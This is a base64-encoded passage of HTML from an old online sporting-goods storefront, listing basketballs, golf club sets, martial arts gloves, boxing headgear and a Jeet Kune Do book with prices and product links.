PSI0Ij48aW1nIHNyYz0iL2ltYWdlcy9zcGNsZWFyLmdpZiIgd2lkdGg9IjQi
IGhlaWdodD0iMSIgYm9yZGVyPTA+PC90ZD4NDQogIDx0ZCB2YWxpZ249dG9w
IGFsaWduPWNlbnRlciB3aWR0aD0iNDU1Ij4NDQogIDx0YWJsZSB3aWR0aD0i
MTAwJSIgYm9yZGVyPTAgY2VsbHBhZGRpbmc9MCBjZWxsc3BhY2luZz0wPg0N
CiAgPHRyPg0NCgkgIDx0ZCB3aWR0aD0iMTAiIHJvd3NwYW49IjIiPjxpbWcg
c3JjPSIvaW1hZ2VzLzE2NDcvMTczMi8xNjg4L3RsX2Nvcm5lci5naWYiIHdp
ZHRoPTEwIGhlaWdodD0xMCBib3JkZXI9MD48L3RkPg0NCgkgIDx0ZCB3aWR0
aD0iMTAwJSIgYmdjb2xvcj0iI0ZGRkZGRiI+PGltZyBzcmM9Ii9pbWFnZXMv
c3BjbGVhci5naWYiIHdpZHRoPTEgaGVpZ2h0PTEgYm9yZGVyPTA+PC90ZD4N
DQoJICA8dGQgd2lkdGg9IjEwIiByb3dzcGFuPSIyIj48aW1nIHNyYz0iL2lt
YWdlcy8xNjQ3LzE3MzIvMTY4OC90cl9jb3JuZXIuZ2lmIiB3aWR0aD0xMCBo
ZWlnaHQ9MTAgYm9yZGVyPTA+PC90ZD4NDQogIDwvdHI+DQ0KICA8dHI+DQ0K
CSAgPHRkIHdpZHRoPSIxMDAlIiBiZ2NvbG9yPSNmZmZmZmY+PGltZyBzcmM9
Ii9pbWFnZXMvc3BjbGVhci5naWYiIHdpZHRoPTEgaGVpZ2h0PTkgYm9yZGVy
PTA+PC90ZD4NDQogIDwvdHI+DQ0KICA8L3RhYmxlPg0NCiAgPHRhYmxlIHdp
ZHRoPSIxMDAlIiBib3JkZXI9MCBjZWxscGFkZGluZz0wIGNlbGxzcGFjaW5n
PTA+DQ0KICA8dHI+DQ0KICAgIDx0ZCB3aWR0aD0iIzEiIGJnY29sb3I9IiNG
RkZGRkYiPjxpbWcgc3JjPSIvaW1hZ2VzL3NwY2xlYXIuZ2lmIiB3aWR0aD0x
IGhlaWdodD0xIGJvcmRlcj0wPjwvdGQ+DQ0KCSAgPHRkIHdpZHRoPSIxMDAl
IiB2YWxpZ249dG9wIGJnY29sb3I9I2ZmZmZmZiBhbGlnbj1jZW50ZXI+DQ0K
CSAgPHRhYmxlIHdpZHRoPSIxMDAlIiBib3JkZXI9MCBjZWxscGFkZGluZz0i
MiIgY2VsbHNwYWNpbmc9MD4NDQoJICA8dHI+DQ0KPCEtLSBob21lIC0tPg0N
Cjx0ZCB3aWR0aD0iNDQwIiB2YWxpZ249InRvcCIgYWxpZ249ImNlbnRlciIg
Ymdjb2xvcj0iI0ZGRkZGRiI+DQ0KPHRhYmxlIHdpZHRoPSIxMDAlIiBib3Jk
ZXI9IjAiIGNlbGxwYWRkaW5nPSIzIiBjZWxsc3BhY2luZz0iMSI+DQ0KPHRy
Pg0NCiAgPHRkIHZhbGlnbj0idG9wIiBWQUxJR049IlRPUCIgQUxJR049IkNF
TlRFUiI+PHRhYmxlIGNlbGxwYWRkaW5nPSIwIiBjZWxsc3BhY2luZz0iMCIg
Ym9yZGVyPSIwIiBXSURUSD0iMTAwJSI+DQ0KPHRyPg0NCiAgPHRkIFZBTElH
Tj0iVE9QIiBBTElHTj0ibGVmdCI+PGZvbnQgZmFjZT0iQXJpYWwiIGNvbG9y
PSIjMDAwMDAwIiBzaXplPSIyIiBzdHlsZT0iZm9udC1zaXplOiAxMHB0OyI+
PGI+U2hvcHBpbmcgd2l0aCB1cyBpcyAxMDAlIHNhZmUgd2l0aCBvdXIgJnF1
b3Q7PGEgaHJlZj0iaHR0cDovL3d3dy52c3RvcmUuY29tL2NnaS1iaW4vcGFn
ZWdlbi92c3RvcmVzcG9ydHMvYmVsb3d3aG9sZXNhbGVzcG9ydHMvcGFnZS5o
dG1sP21vZGU9aGVscCZmaWxlPS9wYWdlL2hlbHAvaGVscF9zYWZlX3Nob3Au
c3BsIj5TYWZlU2hvcDwvYT4mcXVvdDsgZ3VhcmFudGVlLjwvdGQ+DQ0KPC90
cj4NDQo8L3RhYmxlPgkJPC90ZD4NDQo8L3RyPg0NCjwvVEFCTEU+DQ0KDQ0K
PHRhYmxlIHdpZHRoPSIxMDAlIiBib3JkZXI9IjAiIGNlbGxwYWRkaW5nPSIw
IiBjZWxsc3BhY2luZz0iMCI+DQ0KPHRyPg0NCg0NCiAgPHRkIGNvbHNwYW49
IjYiPjxmb250IGZhY2U9IkFyaWFsIiBjb2xvcj0iIzAwMDAwMCIgc2l6ZT0i
MiI+DQ0KDQ0KICA8L2ZvbnQ+PC90ZD4NDQo8L1RSPg0NCjwhLS0gYiBjYXRs
YXlvdXQgLS0+DQ0KPHRyPg0NCjx0ZCBjb2xzcGFuPTYgcm93c3Bhbj0xPg0N
CjwhLS0gTEFSR0UgU0lERSBJVEVNIC0tPg0NCjx0YWJsZSBib3JkZXI9IjAi
IHdpZHRoPSIxMDAlIiBjZWxsc3BhY2luZz0iMCIgY2VsbHBhZGRpbmc9IjIi
Pg0NCiA8dHI+ICAgPHRkIGNvbHNwYW49IjIiPiAgICA8aW1nIHNyYz0iL2lt
YWdlcy8xNjQ3LzE3MzIvMTY4OC9tb2RoZHJfNnVuaXRfZmVhdHVyZWQuZ2lm
IiB3aWR0aD00MzUgaGVpZ2h0PTI2PiAgICA8L3RkPiA8L3RyPiANDQoNDQoN
DQo8dHI+DQ0KICA8dGQgd2lkdGg9IjUwJSIgdmFsaWduPXRvcD4NDQogIDx0
YWJsZSB3aWR0aD0iMTAwJSI+DQ0KICA8dHI+DQ0KICAgIDx0ZCB2YWxpZ249
dG9wPjxhIGhyZWY9Imh0dHA6Ly93d3cudnN0b3JlLmNvbS9jZ2ktYmluL3Bh
Z2VnZW4vdnN0b3Jlc3BvcnRzL2JlbG93d2hvbGVzYWxlc3BvcnRzL3BhZ2Uu
aHRtbD9tb2RlPWl0ZW1wYWdlJmZpbGU9L3BhZ2UvaXRlbXBhZ2V2NC9pdGVt
cGFnZS5zcGwmcHJvZElEPTM1MTAxMiI+DQ0KPGltZyBib3JkZXI9IjAiIHNy
Yz0iL2FsdF9pbWFnZXMvMjAwMC8zNTEwMTJfMTA1XzEwNS5qcGciIGFsaWdu
PWxlZnQgd2lkdGg9IjEwNSIgaGVpZ2h0PSIxMDUiPjwvQT4gDQ0KICAgIDxm
b250IGZhY2U9IkFyaWFsIiBzaXplPSIyIiBjb2xvcj0iMDAwMDAwIj4NDQo8
Yj5TcGFsZGluZyYjMDE3NCBPZmZpY2lhbCBOQkEgR2FtZSBCYWxsPC9iPjxC
Uj5MZWFybiB0byBwbGF5IGxpa2UgdGhlIHByb3Mgd2l0aCB0aGlzIG9mZmlj
aWFsbHkgZW5kb3JzZWQgTkJBIGJhc2tldGJhbGwhICBJdCdzIG1hZGUgb2Yg
dG9wIGdyYWluIGxlYXRoZXIgcGFuZWxzIHdpdGggZGVlcCwgd2lkZSBjaGFu
bmVscy48YnI+ICAgPGZvbnQgc2l6ZT0xPk9ubHk6PC9mb250PiA8YSBocmVm
PSJodHRwOi8vd3d3LnZzdG9yZS5jb20vY2dpLWJpbi9wYWdlZ2VuL3ZzdG9y
ZXNwb3J0cy9iZWxvd3dob2xlc2FsZXNwb3J0cy9wYWdlLmh0bWw/bW9kZT1p
dGVtcGFnZSZmaWxlPS9wYWdlL2l0ZW1wYWdldjQvaXRlbXBhZ2Uuc3BsJnBy
b2RJRD0zNTEwMTIiPjxmb250IHNpemU9MiBmYWNlPWFyaWFsPjxiPiAkNzQu
OTU8L2I+PC9mb250PjwvQT4NDQogICAgPC9mb250PjwvVEQ+DQ0KICA8L3Ry
Pg0NCiAgPHRyPg0NCiAgICA8dGQ+PGZvbnQgZmFjZT0iQXJpYWwiIHNpemU9
IjEiIGNvbG9yPSIwMDAwMDAiPg0NCjxicj48Zm9udCBzaXplPSIyIj48Yj48
YSBocmVmPSJodHRwOi8vd3d3LnZzdG9yZS5jb20vY2dpLWJpbi9wYWdlZ2Vu
L3ZzdG9yZXNwb3J0cy9iZWxvd3dob2xlc2FsZXNwb3J0cy9wYWdlLmh0bWw/
bW9kZT1wcm9kdWN0cyZmaWxlPS9wYWdlL3Byb2RsaXN0djQvcHJvZHVjdGxp
c3Quc3BsJmNhdElEPTI0Mzk4Ij5Nb3JlIEJhc2tldGJhbGxzPC9hPjwvYj48
L2ZvbnQ+PGJyPg0NCiAgICA8L2ZvbnQ+PC90ZD4NDQogIDwvdHI+DQ0KICA8
L3RhYmxlPg0NCiAgPC90ZD4NDQogIDx0ZCB3aWR0aD0iNTAlIiB2YWxpZ249
dG9wPg0NCiAgPHRhYmxlIHdpZHRoPSIxMDAlIj4NDQogIDx0cj4NDQogICAg
PHRkIHZhbGlnbj10b3A+PGEgaHJlZj0iaHR0cDovL3d3dy52c3RvcmUuY29t
L2NnaS1iaW4vcGFnZWdlbi92c3RvcmVzcG9ydHMvYmVsb3d3aG9sZXNhbGVz
cG9ydHMvcGFnZS5odG1sP21vZGU9aXRlbXBhZ2UmZmlsZT0vcGFnZS9pdGVt
cGFnZXY0L2l0ZW1wYWdlLnNwbCZwcm9kSUQ9OTMzMDg1Ij4NDQogICAgIDxp
bWcgYm9yZGVyPSIwIiBzcmM9Ii9hbHRfaW1hZ2VzLy8yMDAwLzkzMzA4NV83
NV83NS5qcGciIHdpZHRoPSI3NSIgaGVpZ2h0PSI3NSI+PC9hPiANDQogICAg
PC90ZD4NDQogICAgPHRkIHZhbGlnbj10b3A+PGZvbnQgZmFjZT0iQXJpYWwi
IHNpemU9IjIiIGNvbG9yPSIwMDAwMDAiPg0NCjxiPkxlbm55IFdpbGtlbnMg
TGVnYWN5IEJhc2tldGJhbGwgU2VyaWVzPC9iPjxCUj5UYWtlcyB5b3UgdGhy
b3VnaCB0aGUgYmFzaWMgZnVuZGFtZW50YWxzIG9mIHRoZSBzcG9ydC48YnI+
ICAgPGZvbnQgc2l6ZT0xPk9ubHk6PC9mb250PiA8YSBocmVmPSJodHRwOi8v
d3d3LnZzdG9yZS5jb20vY2dpLWJpbi9wYWdlZ2VuL3ZzdG9yZXNwb3J0cy9i
ZWxvd3dob2xlc2FsZXNwb3J0cy9wYWdlLmh0bWw/bW9kZT1pdGVtcGFnZSZm
aWxlPS9wYWdlL2l0ZW1wYWdldjQvaXRlbXBhZ2Uuc3BsJnByb2RJRD05MzMw
ODUiPjxmb250IHNpemU9MiBmYWNlPWFyaWFsPjxiPiAkMzkuOTY8L2I+PC9m
b250PjwvQT4NDQogICAgPC9mb250PjwvdGQ+DQ0KICA8L3RyPg0NCiAgPHRy
Pg0NCiAgICA8dGQgdmFsaWduPXRvcD4NDQogPGEgaHJlZj0iaHR0cDovL3d3
dy52c3RvcmUuY29tL2NnaS1iaW4vcGFnZWdlbi92c3RvcmVzcG9ydHMvYmVs
b3d3aG9sZXNhbGVzcG9ydHMvcGFnZS5odG1sP21vZGU9aXRlbXBhZ2UmZmls
ZT0vcGFnZS9pdGVtcGFnZXY0L2l0ZW1wYWdlLnNwbCZwcm9kSUQ9NzQwNDMy
Ij4gDQ0KIDxpbWcgYm9yZGVyPSIwIiBzcmM9Ii9hbHRfaW1hZ2VzLy8yMDAw
Lzc0MDQzMl83NV83NS5qcGciIHdpZHRoPSI3NSIgaGVpZ2h0PSI3NSI+PC9h
PiANDQogICAgPC90ZD4NDQogICAgPHRkIHZhbGlnbj10b3A+PGZvbnQgZmFj
ZT0iQXJpYWwiIHNpemU9IjIiIGNvbG9yPSIwMDAwMDAiPg0NCjxiPkdvYWwg
U3BvcnRpbmcgR29vZHMgUGFyayBhbmQgUmVjIFJpbTwvYj48QlI+SGVhdnkg
ZHV0eSByaW0gd2l0aCBleHRyYSBzdXBwb3J0Ljxicj4gICA8Zm9udCBzaXpl
PTE+T25seTo8L2ZvbnQ+IDxhIGhyZWY9Imh0dHA6Ly93d3cudnN0b3JlLmNv
bS9jZ2ktYmluL3BhZ2VnZW4vdnN0b3Jlc3BvcnRzL2JlbG93d2hvbGVzYWxl
c3BvcnRzL3BhZ2UuaHRtbD9tb2RlPWl0ZW1wYWdlJmZpbGU9L3BhZ2UvaXRl
bXBhZ2V2NC9pdGVtcGFnZS5zcGwmcHJvZElEPTc0MDQzMiI+PGZvbnQgc2l6
ZT0yIGZhY2U9YXJpYWw+PGI+ICQ5NC45OTwvYj48L2ZvbnQ+PC9BPjxicj4N
DQogICAgPC9mb250PjwvdGQ+DQ0KICA8L3RyPg0NCiAgPHRyPg0NCiAgICA8
dGQgY29sc3Bhbj0yPjxmb250IGZhY2U9IkFyaWFsIiBzaXplPSIxIiBjb2xv
cj0iMDAwMDAwIj4NDQoNDQogICAgPC9mb250PjwvdGQ+DQ0KICA8L3RyPg0N
CiAgPC90YWJsZT4NDQogIDwvdGQ+DQ0KPC90cj4NDQo8L3RhYmxlPg0NCjwh
LS0gZW5kIGxhcmdlIHNpZGUgaXRlbSAtLT4NDQo8L3RkPg0NCjwvdHI+DQ0K
PHRyPg0NCjx0ZCBjb2xzcGFuPTYgcm93c3Bhbj0xPg0NCjwhLS0gVEhSRUUg
U1RBQ0tFRCBCWSBUSFJFRSBTVEFDS0VEIC0tPg0NCgk8dGFibGUgYm9yZGVy
PSIwIiB3aWR0aD0iNDIwIiBjZWxsc3BhY2luZz0iMCIgY2VsbHBhZGRpbmc9
IjIiIEFMSUdOPSJDRU5URVIiPg0NCgkJPHRyPg0NCgkJCTx0ZCBBTElHTj0i
TEVGVCIgVkFMSUdOPSJNSURETEUiIHdpZHRoPSI1MCUiPg0NCgkJCQkgCQkJ
CQk8aW1nIHNyYz0iL2ltYWdlcy8xNjQ3LzE3MzIvMTY4OC9tb2RoZHJfMnVu
aXRfZmF2b3JpdGVzLmdpZiIgd2lkdGg9IjEzOCIgaGVpZ2h0PSIyNiI+IAkJ
CQkNDQoJCQk8L3RkPg0NCgkJCTx0ZCBBTElHTj0iTEVGVCIgVkFMSUdOPSJN
SURETEUiIHdpZHRoPSI1MCUiPg0NCgkJCQkgCQkJCQk8aW1nIHNyYz0iL2lt
YWdlcy8xNjQ3LzE3MzIvMTY4OC9tb2RoZHJfMnVuaXRfZ2V0aXRoZXJlLmdp
ZiIgd2lkdGg9IjEzOCIgaGVpZ2h0PSIyNiI+IAkJCQkNDQoJCQk8L3RkPg0N
CgkJPC90cj4NDQoJCTx0cj4NDQoJCQk8dGQgd2lkdGg9IjUwJSIgQUxJR049
IkNFTlRFUiIgdmFsaWduPXRvcD4NDQogIAkJCQk8dGFibGUgd2lkdGg9IjEw
MCUiPg0NCgkJCQkJPHRyPg0NCgkJCQkJCTx0ZCB2YWxpZ249dG9wPg0NCgkJ
CQkJCQkgCQkJCQkJCQk8YSBocmVmPSJodHRwOi8vd3d3LnZzdG9yZS5jb20v
Y2dpLWJpbi9wYWdlZ2VuL3ZzdG9yZXNwb3J0cy9iZWxvd3dob2xlc2FsZXNw
b3J0cy9wYWdlLmh0bWw/bW9kZT1pdGVtcGFnZSZmaWxlPS9wYWdlL2l0ZW1w
YWdldjQvaXRlbXBhZ2Uuc3BsJnByb2RJRD0xMjM5MzI5Ij4gCQkJCQkJCQ0N
CgkJCQkJCQkgCQkJCQkJCQk8aW1nIGJvcmRlcj0iMCIgc3JjPSIvYWx0X2lt
YWdlcy8yMDAwLzEyMzkzMjlfNzVfNzUuanBnIiB3aWR0aD0iNzUiIGhlaWdo
dD0iNzUiPjwvYT4gCQkJCQkJCQ0NCgkJCQkJCTwvdGQ+DQ0KCQkJCQkJPHRk
IHZhbGlnbj10b3A+DQ0KCQkJCQkJCTxmb250IGZhY2U9IkFyaWFsIiBzaXpl
PSIyIiBjb2xvcj0iMDAwMDAwIj4NDQoJCQkJCQkJCTxiPldpbHNvbiBVbHRy
YSBKci48YnI+Q2x1YiBTZXQgd2l0aCBCYWc8L2I+PEJSPkNhc3QgbWV0YWwg
Zm9yIGluY3JlYXNlZCBkdXJhYmlsaXR5ITxicj4gPGZvbnQgY29sb3I9cmVk
PlNhdmUgOSU8L2ZvbnQ+PGJyPiAgPGZvbnQgc2l6ZT0iMSIgZmFjZT0iYXJp
YWwiPiAgT25seTogPGEgaHJlZj0iaHR0cDovL3d3dy52c3RvcmUuY29tL2Nn
aS1iaW4vcGFnZWdlbi92c3RvcmVzcG9ydHMvYmVsb3d3aG9sZXNhbGVzcG9y
dHMvcGFnZS5odG1sP21vZGU9aXRlbXBhZ2UmZmlsZT0vcGFnZS9pdGVtcGFn
ZXY0L2l0ZW1wYWdlLnNwbCZwcm9kSUQ9MTIzOTMyOSI+PGZvbnQgc2l6ZT0y
IGZhY2U9YXJpYWw+PGI+ICQ4OS45NTwvYj48L2ZvbnQ+PC9BPg0NCgkJCQkJ
CQk8L2ZvbnQ+DQ0KCQkJCQkJPC90ZD4NDQoJCQkJCTwvdHI+DQ0KCQkJCQk8
dHI+DQ0KCQkJCQkJPHRkIHZhbGlnbj10b3A+DQ0KCQkJCQkJCSAJCQkJCQkJ
CTxhIGhyZWY9Imh0dHA6Ly93d3cudnN0b3JlLmNvbS9jZ2ktYmluL3BhZ2Vn
ZW4vdnN0b3Jlc3BvcnRzL2JlbG93d2hvbGVzYWxlc3BvcnRzL3BhZ2UuaHRt
bD9tb2RlPWl0ZW1wYWdlJmZpbGU9L3BhZ2UvaXRlbXBhZ2V2NC9pdGVtcGFn
ZS5zcGwmcHJvZElEPTEyMzkzMDkiPiAJCQkJCQkJDQ0KCQkJCQkJCSAJCQkJ
CQkJCTxpbWcgYm9yZGVyPSIwIiBzcmM9Ii9hbHRfaW1hZ2VzLzIwMDAvMTIz
OTMwOV83NV83NS5qcGciIHdpZHRoPSI3NSIgaGVpZ2h0PSI3NSI+PC9hPiAJ
CQkJCQkJDQ0KCQkJCQkJPC90ZD4NDQoJCQkJCQk8dGQgdmFsaWduPXRvcD4N
DQoJCQkJCQkJPGZvbnQgZmFjZT0iQXJpYWwiIHNpemU9IjIiIGNvbG9yPSIw
MDAwMDAiPg0NCgkJCQkJCQkJPGI+V2lsc29uIFVsdHJhPGJyPkxhZGllcycg
R29sZjxicj5DbHViIFNldDwvYj48QlI+VGl0YW5pdW0gbWF0cml4IGZvciBt
YXhpbXVtIGRpc3RhbmNlLjxicj4gPGZvbnQgY29sb3I9cmVkPlNhdmUgMTAl
PC9mb250Pjxicj4gIDxmb250IHNpemU9IjEiIGZhY2U9ImFyaWFsIj4gIE9u
bHk6IDxhIGhyZWY9Imh0dHA6Ly93d3cudnN0b3JlLmNvbS9jZ2ktYmluL3Bh
Z2VnZW4vdnN0b3Jlc3BvcnRzL2JlbG93d2hvbGVzYWxlc3BvcnRzL3BhZ2Uu
aHRtbD9tb2RlPWl0ZW1wYWdlJmZpbGU9L3BhZ2UvaXRlbXBhZ2V2NC9pdGVt
cGFnZS5zcGwmcHJvZElEPTEyMzkzMDkiPjxmb250IHNpemU9MiBmYWNlPWFy
aWFsPjxiPiAkMTc5Ljk1PC9iPjwvZm9udD48L0E+DQ0KCQkJCQkJCTwvZm9u
dD4NDQoJCQkJCQk8L3RkPg0NCgkJCQkJPC90cj4NDQoJCQkJCTx0cj4NDQoJ
CQkJCQk8dGQgdmFsaWduPXRvcD4NDQoJCQkJCQkJIAkJCQkJCQkJPGEgaHJl
Zj0iaHR0cDovL3d3dy52c3RvcmUuY29tL2NnaS1iaW4vcGFnZWdlbi92c3Rv
cmVzcG9ydHMvYmVsb3d3aG9sZXNhbGVzcG9ydHMvcGFnZS5odG1sP21vZGU9
aXRlbXBhZ2UmZmlsZT0vcGFnZS9pdGVtcGFnZXY0L2l0ZW1wYWdlLnNwbCZw
cm9kSUQ9MTQxODYxMyI+IAkJCQkJCQkNDQoJCQkJCQkJIAkJCQkJCQkJPGlt
ZyBib3JkZXI9IjAiIHNyYz0iL2FsdF9pbWFnZXMvMjAwMC8xNDE4NjEzXzc1
Xzc1LmpwZyIgd2lkdGg9Ijc1IiBoZWlnaHQ9Ijc1Ij48L2E+IAkJCQkJCQkN
DQoJCQkJCQk8L3RkPg0NCgkJCQkJCTx0ZCB2YWxpZ249dG9wPg0NCgkJCQkJ
CQk8Zm9udCBmYWNlPSJBcmlhbCIgc2l6ZT0iMiIgY29sb3I9IjAwMDAwMCI+
DQ0KCQkJCQkJCQk8Yj5Ob3J0aHdlc3Rlcm4gR29sZiBHcmFwaGl0ZSBHb2xm
PGJyPkNsdWIgU2V0PC9iPjxCUj5RdWFkIGNoYW5uZWwgd2VpZ2h0aW5nIHRv
IGVsaW1pbmF0ZSBkcmFnLjxicj4gPGZvbnQgY29sb3I9cmVkPlNhdmUgMjQl
PC9mb250Pjxicj4gICA8Zm9udCBzaXplPSIxIiBmYWNlPSJhcmlhbCI+ICBP
bmx5OiA8YSBocmVmPSJodHRwOi8vd3d3LnZzdG9yZS5jb20vY2dpLWJpbi9w
YWdlZ2VuL3ZzdG9yZXNwb3J0cy9iZWxvd3dob2xlc2FsZXNwb3J0cy9wYWdl
Lmh0bWw/bW9kZT1pdGVtcGFnZSZmaWxlPS9wYWdlL2l0ZW1wYWdldjQvaXRl
bXBhZ2Uuc3BsJnByb2RJRD0xNDE4NjEzIj48Zm9udCBzaXplPTIgZmFjZT1h
cmlhbD48Yj4gJDE4OS45NTwvYj48L2ZvbnQ+PC9BPg0NCgkJCQkJCQk8L2Zv
bnQ+DQ0KCQkJCQkJPC90ZD4NDQoJCQkJCTwvdHI+DQ0KCQkJCQk8dHI+DQ0K
CQkJCQkJPHRkIGNvbHNwYW49Mj4NDQoJCQkJCQkJPGZvbnQgZmFjZT0iQXJp
YWwiIHNpemU9IjEiIGNvbG9yPSIwMDAwMDAiPg0NCgkJCQkJCQkJDQ0KCQkJ
CQkJCTwvZm9udD4NDQoJCQkJCQk8L3RkPg0NCgkJCQkJPC90cj4NDQoJCQkJ
PC90YWJsZT4NDQogIAkJCTwvdGQ+DQ0KCQkJPHRkIHdpZHRoPSI1MCUiIEFM
SUdOPSJDRU5URVIiIHZhbGlnbj10b3A+DQ0KICAJCQkJPHRhYmxlIHdpZHRo
PSIxMDAlIj4NDQoJCQkJCTx0cj4NDQoJCQkJCQk8dGQgdmFsaWduPXRvcD4N
DQoJCQkJCQkJIAkJCQkJCQkJPGEgaHJlZj0iaHR0cDovL3d3dy52c3RvcmUu
Y29tL2NnaS1iaW4vcGFnZWdlbi92c3RvcmVzcG9ydHMvYmVsb3d3aG9sZXNh
bGVzcG9ydHMvcGFnZS5odG1sP21vZGU9aXRlbXBhZ2UmZmlsZT0vcGFnZS9p
dGVtcGFnZXY0L2l0ZW1wYWdlLnNwbCZwcm9kSUQ9MTI0NjU3OSI+IAkJCQkJ
CQkNDQoJCQkJCQkJIAkJCQkJCQkJPGltZyBib3JkZXI9IjAiIHNyYz0iL2Fs
dF9pbWFnZXMvMjAwMC8xMjQ2NTc5Xzc1Xzc1LmpwZyIgd2lkdGg9Ijc1IiBo
ZWlnaHQ9Ijc1Ij48L2E+IAkJCQkJCQkNDQoJCQkJCQk8L3RkPg0NCgkJCQkJ
CTx0ZCB2YWxpZ249dG9wPg0NCgkJCQkJCQk8Zm9udCBmYWNlPSJBcmlhbCIg
c2l6ZT0iMiIgY29sb3I9IjAwMDAwMCI+DQ0KCQkJCQkJCQk8Yj5CcnVjZSBM
ZWU8YnI+S2VucG8gR2xvdmVzPC9iPjxCUj5MZWF0aGVyLCBmdWxsIGZpbmdl
ciBpbnRlZ3JhdGVkIG1hcnRpYWwgYXJ0cyBnbG92ZXMuPGJyPiAgIDxmb250
IHNpemU9MT5Pbmx5OjwvZm9udD4gPGEgaHJlZj0iaHR0cDovL3d3dy52c3Rv
cmUuY29tL2NnaS1iaW4vcGFnZWdlbi92c3RvcmVzcG9ydHMvYmVsb3d3aG9s
ZXNhbGVzcG9ydHMvcGFnZS5odG1sP21vZGU9aXRlbXBhZ2UmZmlsZT0vcGFn
ZS9pdGVtcGFnZXY0L2l0ZW1wYWdlLnNwbCZwcm9kSUQ9MTI0NjU3OSI+PGZv
bnQgc2l6ZT0yIGZhY2U9YXJpYWw+PGI+ICQ1OS45NTwvYj48L2ZvbnQ+PC9B
Pg0NCgkJCQkJCQk8L2ZvbnQ+DQ0KCQkJCQkJPC90ZD4NDQoJCQkJCTwvdHI+
DQ0KCQkJCQk8dHI+DQ0KCQkJCQkJPHRkIHZhbGlnbj10b3A+DQ0KCQkJCQkJ
CSAJCQkJCQkJCTxhIGhyZWY9Imh0dHA6Ly93d3cudnN0b3JlLmNvbS9jZ2kt
YmluL3BhZ2VnZW4vdnN0b3Jlc3BvcnRzL2JlbG93d2hvbGVzYWxlc3BvcnRz
L3BhZ2UuaHRtbD9tb2RlPWl0ZW1wYWdlJmZpbGU9L3BhZ2UvaXRlbXBhZ2V2
NC9pdGVtcGFnZS5zcGwmcHJvZElEPTEyNDc4NDkiPiAJCQkJCQkJDQ0KCQkJ
CQkJCSAJCQkJCQkJCTxpbWcgYm9yZGVyPSIwIiBzcmM9Ii9hbHRfaW1hZ2Vz
LzIwMDAvMTI0Nzg0OV83NV83NS5qcGciIHdpZHRoPSI3NSIgaGVpZ2h0PSI3
NSI+PC9hPiAJCQkJCQkJDQ0KCQkJCQkJPC90ZD4NDQoJCQkJCQk8dGQgdmFs
aWduPXRvcD4NDQoJCQkJCQkJPGZvbnQgZmFjZT0iQXJpYWwiIHNpemU9IjIi
IGNvbG9yPSIwMDAwMDAiPg0NCgkJCQkJCQkJPGI+TGVhdGhlciBCb3hpbmcg
SGVhZGdlYXI8L2I+PGJyPkhhcyBjaGVlaywgY2hpbiwgYW5kIGVhciBwcm90
ZWN0aW9uIGZvciBib3hpbmcgYW5kIG1hcnRpYWwgYXJ0cy48YnI+ICAgPGZv
bnQgc2l6ZT0iMSIgZmFjZT0iYXJpYWwiPiAgT25seTogPGEgaHJlZj0iaHR0
cDovL3d3dy52c3RvcmUuY29tL2NnaS1iaW4vcGFnZWdlbi92c3RvcmVzcG9y
dHMvYmVsb3d3aG9sZXNhbGVzcG9ydHMvcGFnZS5odG1sP21vZGU9aXRlbXBh
Z2UmZmlsZT0vcGFnZS9pdGVtcGFnZXY0L2l0ZW1wYWdlLnNwbCZwcm9kSUQ9
MTI0Nzg0OSI+PGZvbnQgc2l6ZT0yIGZhY2U9YXJpYWw+PGI+ICQ0NC45NTwv
Yj48L2ZvbnQ+PC9BPg0NCgkJCQkJCQk8L2ZvbnQ+DQ0KCQkJCQkJPC90ZD4N
DQoJCQkJCTwvdHI+DQ0KCQkJCQk8dHI+DQ0KCQkJCQkJPHRkIHZhbGlnbj10
b3A+DQ0KCQkJCQkJCSAJCQkJCQkJCTxhIGhyZWY9Imh0dHA6Ly93d3cudnN0
b3JlLmNvbS9jZ2ktYmluL3BhZ2VnZW4vdnN0b3Jlc3BvcnRzL2JlbG93d2hv
bGVzYWxlc3BvcnRzL3BhZ2UuaHRtbD9tb2RlPWl0ZW1wYWdlJmZpbGU9L3Bh
Z2UvaXRlbXBhZ2V2NC9pdGVtcGFnZS5zcGwmcHJvZElEPTQ0NTI5MiI+IAkJ
CQkJCQkNDQoJCQkJCQkJIAkJCQkJCQkJPGltZyBib3JkZXI9IjAiIHNyYz0i
L2FsdF9pbWFnZXMvMjAwMC80NDUyOTJfNzVfNzUuanBnIiB3aWR0aD0iNzUi
IGhlaWdodD0iNzUiPjwvYT4gCQkJCQkJCQ0NCgkJCQkJCTwvdGQ+DQ0KCQkJ
CQkJPHRkIHZhbGlnbj10b3A+DQ0KCQkJCQkJCTxmb250IGZhY2U9IkFyaWFs
IiBzaXplPSIyIiBjb2xvcj0iMDAwMDAwIj4NDQoJCQkJCQkJCTxiPkplZXQg
S3VuZSBEby1FbnRlcmluZyB0byBUcmFwcGluZyB0byBHcmFwcGxpbmc8L2I+
PEJSPkJ5IExhcnJ5IEhhcnRzZWxsLCBvbmUgb2YgQnJ1Y2UgTGVlJ3Mgb3Jp
Z2luYWwgc3R1ZGVudHMuPGJyPiAgIDxmb250IHNpemU9IjEiIGZhY2U9ImFy
aWFsIj4gIE9ubHk6IDxhIGhyZWY9Imh0dHA6Ly93d3cudnN0b3JlLmNvbS9j
Z2ktYmluL3BhZ2VnZW4vdnN0b3Jlc3BvcnRzL2JlbG93d2hvbGVzYWxlc3Bv
cnRzL3BhZ2UuaHRtbD9tb2RlPWl0ZW1wYWdlJmZpbGU9L3BhZ2UvaXRlbXBh
Z2V2NC9pdGVtcGFnZS5zcGwmcHJvZElEPTQ0NTI5MiI+PGZvbnQgc2l6ZT0y
IGZhY2U9YXJpYWw+PGI+ICQxMi45OTwvYj48L2ZvbnQ+PC9BPg0NCgkJCQkJ
CQk8L2ZvbnQ+DQ0KCQkJCQkJPC90ZD4NDQoJCQkJCTwvdHI+DQ0KCQkJCQk8
dHI+DQ0KIAkJCQkJCTx0ZCBjb2xzcGFuPTI+DQ0KCQkJCQkJCTxmb250IGZh
Y2U9IkFyaWFsIiBzaXplPSIxIiBjb2xvcj0iMDAwMDAwIj4NDQoJCQkJCQkJ
CQ0NCgkJCQkJCQk8L2ZvbnQ+DQ0KCQkJCQkJPC90ZD4NDQoJCQkJCTwvdHI+
DQ0KCQkJCTwvdGFibGU+DQ0KCQkJPC90ZD4NDQoJCTwvdHI+DQ0KCTwvdGFi
bGU+DQ0KPCEtLSBUSFJFRSBTVEFDS0VEIEJZIFRIUkVFIFNUQUNLRUQgLS0+
DQ0KPC90ZD4NDQo8L3RyPg0NCjx0cj4NDQo8dGQgY29sc3Bhbj02IHJvd3Nw
